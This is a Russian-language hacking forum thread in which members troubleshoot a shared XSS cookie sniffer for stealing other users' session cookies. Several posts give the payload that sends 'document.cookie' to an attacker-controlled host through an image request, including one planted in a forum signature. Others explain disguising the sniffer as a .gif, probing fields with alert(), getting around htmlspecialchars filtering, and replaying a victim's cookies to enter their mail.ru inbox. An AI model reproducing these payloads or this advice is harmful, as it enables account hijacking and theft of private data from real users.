|
xss сначала найди (или купи), а потом уже в сниффер иди..
|
Держи =)
Скрытый текст (вы должны быть авторизованы и иметь 20 сообщений): У вас нет прав чтобы видеть скрытый текст, который находится здесь Я еще использую пересылку на icq, но она не всегда приходит, нужно ее до конца настроить... |
Короче я сделал так:
Залил свою картинку на НРС сниффер В подпись на prosims.ru добавил code: http://httpz.ru/hkf744co8d.png?+document.cookie; То что в коде - находится в теге [IMG][/IMG], я не написал его (тэг) в коде, так как он показывает картинку со сниффера, нехочу шоб у кого-нить куки увели! И короче вот: IMAGE http://s04.radikal.ru/i177/1007/07/4228f778d409.jpg как узнать куки? Я сам затестил, на себе, куки у мя есть. |
как зашифровать ссылку нормально ?я зашифровал её через http://meyerweb.com
но она получается токая Скрытый текст (вы должны быть авторизованы и иметь 1 сообщений): У вас нет прав чтобы видеть скрытый текст, который находится здесь то есть по ней нельзя перейти чтобы куки пришли, только если её всю скопировать и вставить в адресную строку .Эта можно исправить? о а тут можно перейти по ней ,а когда я отпровляю её в личку то не получается |
stink200, о, да этож магия! :ag:
Чтоб можно было перейти, нужно оформлять ссылку как ссылку, а не просто текст фикачить. Например, на форумах есть для этого тег [url], на мыло ... погугли синтаксис нужных тебе тегов. |
Цитата:
Сообщение от stink200 как зашифровать ссылку нормально ?я зашифровал её через http://meyerweb.com но она получается токая *** скрытый текст *** то есть по ней нельзя перейти чтобы куки пришли, только если её всю скопировать и вставить в адресную строку .Эта можно исправить? о а тут можно перейти по ней ,а когда я отпровляю её в личку то не получается Не везде тем более в личках ссылки кликабельны... Тоесть они как обычный текст.. Добавлено через 1 минуту Цитата: Сообщение от crys01 на форумах есть для этого тег [url], на мыло ... погугли синтаксис нужных тебе тегов. Конечно может быть и в урлах дело |
Помогите!!!Проблема в том,что когда я открываю http://*******s.gif? у меня не записываются логи и не переходит на гугле как задумана.В чем проблема?
|
Когда просто открываешь картинку, и не должно переходить. Вот s.js переходит))
|
А кукисы почему не записываются???
|
M@ZAX@KEP спасибо.я разобрался,короче проблема была в хостинге.щас я сменил на holm.ru и нормально работает.Спасибо за снифер)
какой хостинг посоветуешь? |
alechka, потому что их нет, наверное)))
Когда переходишь по ссылке на s.js, записываются куки той страницы, где ты был до перехода. А если переходишь из пустого окна или только открытой новой вкладки... какие там кукисы-то? =) ЗЫ если отчёт приходит - уже значит что всё работает)) ЗЗЫ кстати, а в сниффере везде адрес хоста-то своего вписал? |
:cheezy::cheezy:
Цитата: Сообщение от DNSrus А когда подставляешь код в принтабельное поле то этот текст нужно отправлять или только написав открывать исходный код? нужно отправлять! :cheezy: |
|
Цитата:
Сообщение от DNSrus а еще вопрос если код выглядит так </script>alert('XSS')<script> это значит что его отфильтровали и ничего нельзя сделать? если отфильтровало функцией htmlspecialchars(), то ничего ни сделаешь!!! |
Попробовал заливать код в картинку но ничего не выходит:
Цитата: img = new Image(); img.src = "http://yourhost.com/s.gif?"+document.cookie; Ссылку изменяю на свою как нужно, на локальном сервере и многих других хостингах браузер показывает "поломанную" картинку, можете дать 100% рабочий пример? (файлы) |
Цитата:
Сообщение от gangsta15 Попробовал заливать код в картинку но ничего не выходит: Ссылку изменяю на свою как нужно, на локальном сервере и многих других хостингах браузер показывает "поломанную" картинку, можете дать 100% рабочий пример? (файлы) Браузер показывает поломанную картинку потому что это текстовый документ вот как происходит на деле! ну что же обьясню по порядку во-первых создаешь просто текстовый документ 2) переимновываешь его в расширение .GIF пример s.gif ( или какой хочешь ) 3) после настраиваешь ксс под твой снифф ))) вот и все если что то не понятно пиши |
Цитата:
Сообщение от sulikoshka Браузер показывает поломанную картинку потому что это текстовый документ вот как происходит на деле! ну что же обьясню по порядку во-первых создаешь просто текстовый документ 2) переимновываешь его в расширение .GIF пример s.gif ( или какой хочешь ) 3) после настраиваешь ксс под твой снифф ))) вот и все если что то не понятно пиши смотри) у меня есть сниффер замаскированный под картинку s.gif Цитата: так же тот файл (которое мазахакер описывал) со следующим содержанием img.gif Цитата: img = new Image(); img.src = "http://site/s.gif?"+document.cookie; Так вот последний я хочу вставить на какой нибудь нужный мне сайт где изображения не обрабатываются ([img][/img]) и чтобы как описывал мазахакер, когда оно подгружаться будет - в нем будет выполняться тот код Цитата: img = new Image(); img.src = "http://site/s.gif?"+document.cookie; И так на мой сниффер (s.gif) будут приходить куки, но когда я вставляю этот файл (img.gif) он отображается "поломанной картинкой" т.е. ничего не подгружается и куков он не посылает =) P.S. Наверное запутал) Я вообще правильно понял тот способ что описывал мазахакер? (последний "абзац" в первом посте) |
Извиняюсь конечно, но тут есть сведения, что способ не ахти какой рабочий... T_T но вобоще попробуй вместо .gif картинки юзать .php
|
vonkolot, не проще ли для перехвата POST-запроса использовать скрипт, аналогичный тому, который записывает данные с фейка? Суть та же самая =)
|
у меня вопрос...пользуюсь этим снифером с начала создания темы...но как то не приходилось встречаться с POST запросами..Можно ли перехватывать этим сниффером POST запросы??
|
люди вопрос может и туповатым показаться но вопрос есть вопрос,
как правильно подставить куки? я на mail.ru када был во входящих менял свои куки на куки жертвы и жертва в этот момент на сайте но почему то после обнавления страницы я в ящик жертвы не перешел КУКИ я менял ПОЛНОСТЬЮ! И ровненько, может кто нибудь скажет как правильно куки подставлять??? ответьте плих в ЛС оч прошу!!! |
Цитата:
Сообщение от HEX xaKer люди вопрос может и туповатым показаться но вопрос есть вопрос, как правильно подставить куки? я на mail.ru када был во входящих менял свои куки на куки жертвы и жертва в этот момент на сайте но почему то после обнавления страницы я в ящик жертвы не перешел КУКИ я менял ПОЛНОСТЬЮ! И ровненько, может кто нибудь скажет как правильно куки подставлять??? ответьте плих в ЛС оч прошу!!! Советую посмотреть видео - http://depositfiles.com/ru/files/1p6w2m91m (Видео от "SOKOL) там все по сифферу,+ ответ и наглядный показ на твой ответ. |
Я скачал ваш сниффер, но там все архивы битые у меня, перезалейте, пожалуйста.
Потом в коде для активной Xss недописано куда куки запишутся, допищите, пожалуйста. И на счёт userhost не понял, какой-нибудь дайте для примера. |
Цитата:
Я скачал ваш сниффер, но там все архивы битые у меня, перезалейте, пожалуйста. Все архивы в полном ажуре, не знаю у кого что битое. Говорят, некоторые авири уже на сам линк ругаются, отключаем, качаем, снова включаем если очень страшно xD Цитата: Потом в коде для активной Xss недописано куда куки запишутся, допищите, пожалуйста. Цитата: img = new Image(); img.src = "http://unet.phpnet.us/s/s.gif?"+document.cookie; Всё наместе, даже выделил. Опять не знаю у кого что недописано. Кстати, откудаж такие сведения, если архивы битые? Цитата: И на счёт userhost не понял, какой-нибудь дайте для примера. Когда зальёшь сниффер на свой хостинг - вот URL-адрес твоего хоста тебе примером и будет)) |
можете разжевать?
Ужасна распрастраннёная узявимость типа alert() Пытаемся вставить во все различные поля этот скрипт... если вышло сообщение значит скрипт обработался и выполнился. не очень понял какое сообщение, сообщение должно вывестись которое я написал? т.е. alert() ? и если у меня ток выводится в сообщении alert(), что это значит) |
Цитата:
Сообщение от Shady3000rf можете разжевать? Ужасна распрастраннёная узявимость типа alert() Пытаемся вставить во все различные поля этот скрипт... если вышло сообщение значит скрипт обработался и выполнился. не очень понял какое сообщение, сообщение должно вывестись которое я написал? т.е. alert() ? и если у меня ток выводится в сообщении alert(), что это значит) НЕЕЕ, сообщение такого типа:IMAGE http://hacker-school.ucoz.ru/img/xss/1.png ПОМОГ + |
ага) эм а что там в этом сообщение должно быть написано? что типо этого нельзя написать или что?:realangel:
|
Shady3000rf, ничего не должно быть. Появление рамки сообщения (alert) свидетельствует о том, что код alert(); выполнился и есть XSS-уязвимость. (возможно внедрение другого произвольного кода)
|
други ну не пинайте, скажите куки приходят именно с того сайта ,где выполнен XSS? или с любуго, который юзер посетил заранее? тоесть по сути, мне надо пароль с почты украсть допустим маил ру, мне надо именно пасивку или активку юзать маила ру, или любого другова сайта и если юзер раньше зашел на маил и потом прошел на сторонний мой сайт с XSS с смоим снифером я получу куки с маила ,или нет?
|
Цитата:
Сообщение от SPA-MAS други ну не пинайте, скажите куки приходят именно с того сайта ,где выполнен XSS? Да, и никак иначе |
а вот вопрос:
если не отоброжаются в исходнике символа <> а вместо них кодировки. </script>alert('XSS')< это считается как xss? |
biara, попробуй в юникод перевести или в hex.. может поможет) лично я с такой же проблеммой столкнулся..
|
biara, нет, это не xss, всё в точности до наоборот)) Это замена символов на соответствующие им текстовые коды в html, чтобы они не выполнялись, а просто отображались на странице.
|
M@ZAX@KEP, это возможно обойти? допустим сменой кодировки?
|
|
Пролистал все скрипты на обоих сайтах.. в каждом скрипте есть либо ><" ...
|
Цитата:
что самый часто встречаемый фильтр - перекодировка символов ><" ... Это простая функция в php: code: htmlspecialchars($string); Добавлено через 1 минуту Кстати, тоже щас задумался над этим, сижу листаю _http://www.google.com/search?q=обход+htmlspecialchars&ie=utf-8&oe=utf-8 )) Добавлено через 7 минут Не обнадёжило...(( |
M@ZAX@KEP, прикольно.. тоесть XSS по всему сайту отпадает? Т.к. на каждой странице будет вбит скрипт на изменение <>" и обойти его никак нельзя =/
Но раз XSS жива, значит народ как-то обходит этот фильтр =) Имхо, надо искать скрипт, без использования " и <>.. я пару раз такие встречал, только внимание не обращал) p.s. На хаккере нашел статью по XSS вакцинам Вот что там пишут на эту тему: Скрытый текст (вы должны быть авторизованы и иметь 1 сообщений): У вас нет прав чтобы видеть скрытый текст, который находится здесь ссылка - http://www.xakep.ru/magazine/xs/075/050/1.asp Я так понимаю что речь идёт про условия (если то-то, то делать то-то), но как это помогает обойти фильтр? О.о Лично я недопонял =/ |
На хост заливать всё. Безо всяких винраров. Мне кажется, я и так по заливке всё понятно написал.
if !(понятно) then {learn(hard);} else {do_not_ask_silly_questions(at_all);}; |
Прошу в дальнейшем с вопросами, не касающимися непосредственно темы XSS, обращаться в другие разделы или соответствующие вашим вопросам темы.
Если вы не знаете, что такое хостинг, нечего вам вообще про xss читать. |
| Время: 21:40 |